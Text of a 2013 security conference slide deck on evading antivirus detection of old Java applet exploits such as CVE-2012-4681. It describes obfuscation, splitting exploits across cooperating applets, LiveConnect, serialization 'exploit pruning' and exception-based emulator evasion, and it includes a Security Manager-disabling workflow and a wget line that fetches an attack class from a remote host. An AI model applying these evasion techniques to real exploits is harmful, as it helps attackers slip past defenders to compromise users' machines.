Smashing Exploit Detectors:
The Java Exploits Case
Donato Ferrante
( @dntbug )
CounterMeasure
Ottawa, 8 Nov 2013
ReVuln
Who?
Donato Ferrante
oCo-Founder and Principal Security Researcher at ReVuln Ltd.
donato@revuln.com
twitter.com/dntbug
ReVuln Ltd.
ReVuln Ltd. 2
We talk about
Java
+
Old Java Exploits
ReVuln Ltd. 3
Why Java?
ReVuln Ltd. 4
Why Old Exploits? (1/2)
*
ReVuln Ltd. 5
From WebSense [1] “real-time telemetry about which versions of Java are
actively being used across tens of millions of endpoints..”
* At the time of this report
Why Old Exploits? (2/2)
ReVuln Ltd. 6
From Kaspersky [2]
Welcome to Java World
ReVuln Ltd. 7
Java World
Updated
30%
Outdated
70%
Impossible to give an exact estimate
Average based on publicly available info
Without using any 0-day vulnerabilities an
attacker can target ~70% of the Java users..
ReVuln Ltd. 8
Java Users
.. But if you are using an outdated
version of the JRE, you may feel safe
because you are using pro-active
/ pro-* / detectors to spot whenever
an old vulnerability is used against
your systems..
ReVuln Ltd. 9
Our Goal
To be able to bypass detections of these detectors
on exploits for old vulnerabilities
ReVuln Ltd. 10
Attacker
Defender
The Defenders
We randomly selected a number of different
defensive solutions, including:
oMicrosoft Security Essential / Defender
oAVG Internet Security 2014
oF-Secure Antivirus
oTrendMicro Titanium Max Security
oSymantec Norton 360
oAnd others..
We had to pick a subset, because for obvious
reasons we didn’t want to upload any sample
using new techniques on VirusTotal, etc.
ReVuln Ltd. 11
The Attackers
An old vulnerability (CVE-2012-4681) and an old exploit
to harden (original exploit [3] by @jduck)
Via Applet
oA Java Applet is an application written in Java
oEmbedded on a web page
oExecuted within a Java Virtual Machine (JVM)
in a process separate from the web browser itself
ReVuln Ltd. 12
Applets
ReVuln Ltd. 13
The security manager is a class that allows applications to implement
a security policy. It allows an application to determine, … , what the
operation is and whether it is being attempted in a security context
that allows the operation to be performed.
Workflow
The workflow is something like:
oGet access to sun.awt.SunToolkit
Supposed to be a restricted package
oCall methods indirectly to trick the JVM Verifier
oGet access to a private field of Statement
Via SunToolkit.GetField()
oDefine a new access control context
All permissions
oCreate a Statement to disable the Security Manager
oUse the Field to change the permission of the Statement
oDisable the Security Manager
ReVuln Ltd. 14
Detection Rate
ReVuln Ltd. 15
We used the basic version of the exploit
Microsoft Security
Essential / Defender
AVG Internet
Security 2014
TrendMicro
Titanium Max
Security
Symantec Norton
360
F-Secure Antivirus
Exploit:Java/CVE-
2012-4681.AIN
Java/Exploit.BBJ JAVA_EXPL.SM4 Web Attack:
Malicious JAR
Download CVE-
2012-4681
Exploit:Java/CVE-
2012-4681.F
The Bytecode
One of the “weaknesses” for Java code is in the
bytecode, as you can see it discloses a lot of
information:
ReVuln Ltd. 16
Hardening: Base
ReVuln Ltd. 17
Introduction
Back in 2011, I (with inREVERSE [4]) presented at the
CARO conference a study on Java malware,
vulnerabilities, and about common techniques used
to avoid detections [5].
Surprisingly most of these techniques are still widely
used and still effective nowadays..
ReVuln Ltd. 18
Techniques
While these techniques add nothing new to this
area, they are still interesting to know
We are going to quickly cover the following
techniques, just for the sake of completeness:
1) Flooding based
2) De-numberation
3) Reflection
ReVuln Ltd. 19
Flooding based
Add a random number of:
oFake Variables
oFake Methods
oMethod chains
oControl-flow directives
ReVuln Ltd. 20
De-numberation
If an attacker uses Strings they will appear as plain-text in
the ConstantPool*..
An attacker can use numbers instead:
oString = [ char ] = [ number ]
oOn numbers, one can perform math operations to obfuscate the original
String, and load the real string in memory only when needed at Runtime
ReVuln Ltd. 21
Reflection
According to IBM [6]: “Reflection gives your code
access to internal information for classes loaded into
the JVM and allows you to write code that works
with classes selected during execution, not in the
source code. This makes reflection a great tool for
building flexible applications”.
In our opinion the last sentence should be:
“.. This makes reflection a great tool for building
flexible exploits”.
ReVuln Ltd. 22
Reflection: Proxy Call
ReVuln Ltd. 23
1
2
1
2
3 4
3
4
5 5
5
Detection
ReVuln Ltd. 24
We applied a combination of these techniques
The detection dropped from 30 to 12 (average)
If you are interested in this kind of hardening, there is a good
blog post [7] about evading AV by @SecObscurity
Microsoft Security
Essential /
Defender
AVG Internet
Security 2014
TrendMicro
Titanium Max
Security
Symantec Norton
360
F-Secure
Antivirus
Exploit:Java/CVE-
2012-4681
Java/CVE-2012-
4681
- - Exploit:Java/CVE-
2012-4681.F
Hardening: Advanced
ReVuln Ltd. 25
Sharing
ReVuln Ltd. 26
Sharing
In general, Applets on the same page share the
same JVM
So what happens if an attacker uses multiple
Applets to cooperatively exploit a vulnerability?
If almost none of the Applets cooperating to exploit
the vulnerability is doing anything obviously evil
per-se, how can you detect them?
ReVuln Ltd. 27
Sharing: Stage I
Exploit-divide
oSplit the original exploit code in several sub-exploits
ReVuln Ltd. 28
Exploit
Code
Code
Sharing: Stage II-a
Applet-divide
oDeploy the code to different Applets (even legit ones)
ReVuln Ltd. 29
Exploit
Code
Code Applets
Code
Sharing: Stage II-b
Applet-divide
oDeploy the code to different Applets (even legit ones)
oThe concept..
ReVuln Ltd. 30
1 : 1
1 : 4
Before..
..After
EXPLOIT : APPLET
Sharing: Stage III
Run
oThe master (main) Applet will instruct the minion Applets to execute their
code in a given sequence
oNote that the Master Applet is optional, minions can execute their code
independently or agree on a specific order.. without using any explicit
communication
ReVuln Ltd. 31
1, 2.. wait.. calc
ReVuln Ltd. 32
1
2
Cheap way to sync
Recap
We can harden Java exploits by splitting the
original exploit code into a number of different
cooperating Applets
The more the attacker splits the original exploit the
harder will be to detect it
The exploit may be difficult to understand statically
oDon’t think just about exploit Applets, think about mixing/injecting the
exploit code across a number of legit Applets
We didn’t use any explicit Applet communication..
ReVuln Ltd. 33
ReVuln Ltd. 34
AppletContext
AppletContext
An interface that can be used by an Applet to
obtain information about its environment
This interface corresponds to an Applet’s
environment: the document containing the Applet
and any other Applet on the same document
It’s like calling a function of a “remote” Object:
ReVuln Ltd. 35
AppletContext
There are several methods, we are mainly
interested in:
oApplet getApplet(String name)
Finds and returns the Applet in the document represented by this
Applet Context with the given name
oEnumeration getApplets()
Finds all the Applets in the document represented by this Applet
Context
Let’s see a practical example..
ReVuln Ltd. 36
The Plan
ReVuln Ltd. 37
5 Applets to exploit
3 Applets to confuse
1 Applet to communicate
The Channel
Communication
ReVuln Ltd. 38
An Applet
Define a channel structure
To Send/Receive messages
Blocking (optional)
Easy way to deal with Applets
synchronization
Blocking
The Workflow
ReVuln Ltd. 39
Channel Logic
Applets Interaction
Master
ReVuln Ltd. 40
Master
Applet M
1) Produce Class<?>
2) Send Class<?>
3) Try to pwn..
ReVuln Ltd. 41
Try to pwn
Connect to Channel
Send Class<?>
Produce Class<?>
Zero
ReVuln Ltd. 42
Try to execute calc.exe
Class<?>
Zero
Applet 0
1) Wait for Class<?>
2) Produce Expression
3) Exec Expression
4) Produce Field
5) Send Field
ReVuln Ltd. 43
One
ReVuln Ltd. 44
Try to execute calc.exe
Class<?>
Execute Expression
Field
One
Applet 1
1) Produce Permissions
2) Produce AccessControlContext
3) Send Permissions
4) Send AccessControlContext
ReVuln Ltd. 45
Two
ReVuln Ltd. 46
Try to execute calc.exe
Class<?>
Execute Expression
Field
AccessControlContext
Do Permissions and
AccessControlContext
Two
Applet 2
1) Produce Statement
2) Wait for Field
3) Wait for AccessControlContext
4) Set Field
5) Send Statement
ReVuln Ltd. 47
Three
ReVuln Ltd. 48
Try to execute calc.exe
Class<?>
Execute Expression
AccessControlContext
Statement
Do Field and Statement
Field
Do Permissions and
AccessControlContext
Three
Applet 3
1) Wait for Statement
2) Disable Security Manager
ReVuln Ltd. 49
Three
ReVuln Ltd. 50
Try to execute calc.exe
Class<?>
Execute Expression
Field
AccessControlContext
Do Permissions and
AccessControlContext
Statement
DisableSecurityManager
Do Field and Statement
Class<?>
Execute Expression
Field
AccessControlContext
Do Permissions and
AccessControlContext Statement
DisableSecurityManager
Do Field and Statement
Master Again
ReVuln Ltd. 51
Execute calc.exe
Remaining Applets
Applet 4,5,6 ?
ReVuln Ltd. 52
Recap
Take Java exploits hardening to the next level
Useful to increase the level of complexity
It’s basically using Java with Java
What about mixing languages?
ReVuln Ltd. 53
ReVuln Ltd. 54
JavaScript
JavaScript
The Java-JavaScript functionality supported by the JRE is
called LiveConnect
LiveConnect is a feature of Web browsers that allows
Java and JavaScript software to intercommunicate
within a web page
From Java: it allows an Applet to invoke the embedded
scripts of a page or to access the built-in JavaScript
environment
From JavaScript: it allows a script to invoke Applet
methods, or to access the Java runtime libraries
ReVuln Ltd. 55
JavaScript
To use JavaScript, Java code needs:
onetscape.javascript.*
If you reference these JavaScript classes, you will
need to add plugin.jar to your CLASSPATH
At Runtime, the Java Plugin automatically makes
these classes available to the Applets, so no
changes to the Applets or how they are set up are
necessary
ReVuln Ltd. 56
The Plan I
ReVuln Ltd. 57
The Plan II
ReVuln Ltd. 58
NOTE: the following is only one of the possible ways
to implement this kind of communication
HTML Page
ReVuln Ltd. 59
JavaScript
“Status info”
(debugging)
Applet
JS-side Code
ReVuln Ltd. 60
1
2
return a string
print some status info via div
use some JS obfuscation on
the process name: calc.exe
Java-side Code I
ReVuln Ltd. 61
define JS-gate
Java/JS
Function mapping
The Final Mix
ReVuln Ltd. 62
LiveConnect
Can use information coming from HTML tags
Can use information coming from JavaScript
JavaScript code can be obfuscated, etc..
Can use multiple Applets with JavaScript comm.
Requires to evaluate both: Java and JavaScript
ReVuln Ltd. 63
What about detection?
ReVuln Ltd. 64
Detection Rate
ReVuln Ltd. 65
0
When using sharing techniques and a very minimal
obfuscation..
ReVuln Ltd. 66
1,2,3,…,1000 JVM
Multiple JVM
Applets can run in different JVMs
oEven if they are on the same document
We need to set the following parameter:
oseparate_jvm = true
Running in multiple JVMs has two implications:
oAttackers:
Can’t rely directly on the status of the “shared” JVM
Need to split the original exploit carefully
X-JVM communication
oDefenders:
Possible in-memory detection should be now performed on a set of
different JVMs
ReVuln Ltd. 67
Multiple JVM
ReVuln Ltd. 68
An example of X-JVM communication
ReVuln Ltd. 69
X-Origin
X-Origin
ReVuln Ltd. 70
From: http://docs.oracle.com/javase/tutorial/deployment/applet/security.html
They cannot connect to or retrieve resources from any third party server
(any server other than the server it originated from).
X-Origin
ReVuln Ltd. 71
It’s tricky
We can’t leave the domains where the Applets are
hosted
But we can share information/resources across
different remote domains hosting different Applets
JavaScript!
X-Origin
ReVuln Ltd. 72
http://domain-R/app.htm
http://domain-L/app.htm
ReVuln Ltd. 73
Quick Recap
Quick Recap
There are several ways to harden Java exploits:
oSingle or Multiple JVM
oNo-communication
Timers or brute-forcing of the JVM status
oWith communication
AppletContext and JavaScript
oOn different or same domains
We want more..
As part of the exploit code is still in “bytecode”
oEven if in this case it’s scattered among different Applet/HTML/JavaScript
pieces
ReVuln Ltd. 74
ReVuln Ltd. 75
Serialization
Introduction
That’s ACED cafe.. babe
Serialization is the process of translating data
structures or object state into a format that can be
stored [..] and resurrected later in the same or
another computer environment [8]
A sequence of bytes
Can be used to recreate Object
in memory..
ReVuln Ltd. 76
Serialize and Deserialize
ReVuln Ltd. 77
An Object can be serialized or deserialized via:
opublic final void writeObject(Object x) throws IOException
opublic final Object readObject() throws IOException, ClassNotFoundEx.
Deserialization
ReVuln Ltd. 78
readObject()
The readObject() method is called by the JVM
whenever it will try to deserialize an object.. A good
spot to place callbacks
ReVuln Ltd. 79
Using Serialized Object
ReVuln Ltd. 80
1
2
3
GET /SerialPay.class HTTP/1.1
4
Disable Security Manager 5
6
Serialized Object
Caveat I
If we serialize a non-standard JRE class..
ReVuln Ltd. 81
ReVulnSerial + .class
wget http://remote_host/pwn/me/ReVulnSerial.class
CN len CN value
magic
Weak Links
A weak link is a serialized object related to a
non-standard JRE class
Because of its nature a weak link will disclose* its original
class (and its bytecode) during deserialization
To avoid weak links and reduce the amount of info in a
class file, an attacker can go over all the classes
required by the exploit and check whether they are
standard & serializable JRE classes.. and prune..
Welcome Exploit Pruning..
ReVuln Ltd. 82
Exploit Pruning
It produces a mutation M(E) of an input exploit E, reducing the bytecode
info, without introducing weak links.
1. Select* a Serializable and Standard Class C in E
2. Collect all the code that updates the status of an object O ( type C )
3. Check for dependencies*
4. Prune this code (P)
5. Use the pruned code P to produce a serialized object S, which
represents the updated status of the object O in the exploit context
6. Replace P in E, with an assignment like: O = deserialize( S )
7. Repeat* steps from 1 to 6
ReVuln Ltd. 83
Exploit Pruning
ReVuln Ltd. 84
Caveat II
More info re. Serialization format..
No .class definition No info on the ACED stream.. FALSE!
Serialization format detailed in:
oJava Object Serialization Specification, Chapter 6 [9]
No CAFEBABE from ACED but..
ReVuln Ltd. 85
//// BEGIN stream content output
ReVulnSerial _h0x7e0001 = r_0x7e0000;
//// END stream content output
//// BEGIN class declarations (excluding array classes)
class ReVulnSerial implements java.io.Serializable {
}
//// END class declarations
//// BEGIN instance dump
[instance 0x7e0001:
0x7e0000/ReVulnSerial
field data:
0x7e0000/ReVulnSerial:
]
//// END instance dump
Caveat II cont.
ReVuln Ltd. 86
dntbug$ hexdump -C serial
00000000 ac ed 00 05 73 72 00 07 4d 79 43 6c 61 73 73 88 |....sr..MyClass.|
00000010 6b d3 a0 8a 04 46 a3 02 00 03 44 00 04 72 65 5f |k....F....D..re_|
00000020 64 49 00 04 72 65 5f 69 4c 00 04 72 65 5f 73 74 |dI..re_iL..re_st|
00000030 00 12 4c 6a 61 76 61 2f 6c 61 6e 67 2f 53 74 72 |..Ljava/lang/Str|
00000040 69 6e 67 3b 78 70 3f f0 00 00 00 00 00 00 00 00 |ing;xp?.........|
00000050 00 00 74 00 06 52 65 56 75 6c 6e |..t..ReVuln|
0000005b
read: MyClass _h0x7e0002 = r_0x7e0000;
//// BEGIN stream content output
MyClass _h0x7e0002 = r_0x7e0000;
//// END stream content output
//// BEGIN class declarations (excluding array
classes)
class MyClass implements java.io.Serializable {
double re_d;
int re_i;
java.lang.String re_s;
}
//// END class declarations
//// BEGIN instance dump
[instance 0x7e0002: 0x7e0000/MyClass
field data:
0x7e0000/MyClass:
re_d: 1.0
re_i: 0
re_s: r0x7e0003: [String 0x7e0003:
"ReVuln"]
]
//// END instance dump
Recap
A good strategy to add a layer of obscurity
ACED stream is an array of bytes/numbers, which
means obfuscation++
Exploit Pruning helps to reduce the amount of
information available directly from the bytecode
ReVuln Ltd. 87
Hardening Consideration
How to detect hardened exploits:
(some of the possible strategies)
oUse serialization?
ACED parser
oUse JVM sharing?
Memory inspection
oUse AppletContext?
Emulator
oUse LiveConnect?
Emulator + Emulator
ReVuln Ltd. 88
Emulators
Some of the most advanced
detectors on the market use
internal emulators to perform
detection on the Java bytecode..
There are several tricks to bypass emulation-based
defenses, and the following slides highlight one of the
possible strategies..
ReVuln Ltd. 89
Exceptions
An interesting trick to defeat most of the emulators
is to rely on exceptions
In Java we have: try/catch/finally statements
A JVM Exception is represented by a couple:
o<pc, exception_type>
A JVM Exception handler is instead:
o<pc_start, pc_end, pc_handler, exception_type>
ReVuln Ltd. 90
Plan
The idea is simple
Build a chain of exception handlers, by using:
try { } catch(){ } finally { } blocks
Deploy the exploit code into each exception handler
Try to avoid: throw new Exception()
Try to use/abuse JVM Runtime Exceptions
oi.e. exceptions thrown via Runtime when misusing APIs
ReVuln Ltd. 91
Attack
ReVuln Ltd. 92
L
O
G
I
C
DEMO TIME
ReVuln Ltd. 93
Conclusion
ReVuln Ltd. 94
Conclusion I
There are several interesting ways to harden Java exploits
Applets can cooperate with other Applets and/or JavaScript
and/or HTML to exploit vulnerabilities
Applets can cooperate across multiple JVMs on the same or
different domains
Serialization can be used to reduce the information coming
from the Java bytecode
Exceptions can be used to defeat emulation
The strategies shown can be obviously used to harden exploits
for 0-day vulnerabilities
ReVuln Ltd. 95
Conclusion II
ReVuln Ltd. 96
Current defense solutions can’t help against hardened
Java exploits. There is only one valid way to be safe
against old Java issues (at the moment):
KEEP YOUR JRE UPDATED OR DELETE IT
Conclusion III
Detected doesn’t mean it didn’t run on your pc..
ReVuln Ltd. 97
Thanks to..
Nico Waisman (@nicowaisman), for the feedback
on an early draft of this preso
ReVuln Ltd. 98
References
1) Websense on Java attacks
http://community.websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx
2) Kaspersky Lab Report: Java under attack the evolution of exploits in 2012-2013
http://media.kaspersky.com/pdf/Report_Java_under_attack_2012-2013.pdf
3) @jduck original exploit for CVE-2012-4681
http://pastie.org/4594319
4) inREVERSE
http://www.inreverse.net
5) CAR02011 Java Malware Presentation
http://www.inreverse.net/wp-content/uploads/2011/05/DonatoFerrante-JavaMalware.pdf
6) IBM on Java Reflection
http://www.ibm.com/developerworks/library/j-dyn0603/
7) Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681) (@SecObscurity)
http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
8) Serialization
http://en.wikipedia.org/wiki/Serialization
9) Java Object Serialization Specification
http://docs.oracle.com/javase/7/docs/platform/serialization/spec/protocol.html
Oracle Old Java Releases
http://www.oracle.com/technetwork/java/archive-139210.html
CVE-2012-4681 Java 7 0-Day vulnerability analysis by @mihi42 via DeepEndResearch (@DeepEndResearch)
http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html
Java 0day analysis (CVE-2012-4681) by Esteban Guillardoy (@sagar38)
http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html
What Applets Can and Cannot Do
http://docs.oracle.com/javase/tutorial/deployment/applet/security.html
jdeserialize: a toolkit for manipulating/reverse-engineering Java serialization streams
https://code.google.com/p/jdeserialize/
ReVuln Ltd. 99
Thanks!
Questions?
-Donato Ferrante
- donato@revuln.com
- @dntbug
ReVuln Ltd. 100
“Invincibility lies in the defense, the
possibility of victory in the attack.”
ReVuln Ltd. - revuln.com